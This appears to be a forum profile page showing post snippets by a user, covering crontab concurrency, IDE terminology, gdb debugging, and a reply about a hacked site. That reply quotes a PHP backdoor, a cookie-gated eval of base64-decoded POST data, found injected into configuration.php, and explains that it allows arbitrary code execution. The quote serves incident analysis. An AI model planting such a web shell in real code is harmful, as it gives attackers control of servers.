- Upvotes Received
- 1
- Posts with Upvotes
- 1
- Upvoting Members
- 1
- Downvotes Received
- 0
- Posts with Downvotes
- 0
- Downvoting Members
- 0
4 Posted Topics
[QUOTE=left19;1564110]My site was hacked. They inserted this into livesite on configuartion.php if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);} echo '<name=c></textarea>';exit;} what does it say??? Thanks[/QUOTE] This lets someone include encoded PHP code in the request, which will be executed on the server. This allows them to execute arbitrary …
[QUOTE=newbie14;1560984]Dear Adkhan, Yes the overalapping problem is what I am worried in crontab. So what is the workaround the daemon? Where to get start any idea please?[/QUOTE] You can use crontab and still avoid concurrency problems using something like Semaphores: [url]http://www.php.net/manual/en/book.sem.php[/url]
[QUOTE=WaltP;1164900]If the IDE bundles a compiler, it can produce code. As far as most people are concerned, that is a compiler. Don't be so anal...[/QUOTE] For what it's worth, I've always found it a source of confusion when people use IDE and compiler interchangeably. It's an impractical distinction to experienced …
Hi everybody, this is my first post here. I'm trying to find out why lib_ncurses' initscr() is failing on me, so I compiled a quick program that runs it and attached gdb to it. I've only used gdb a few times, so I think I might be misinterpreting what I'm …
The End.
mslade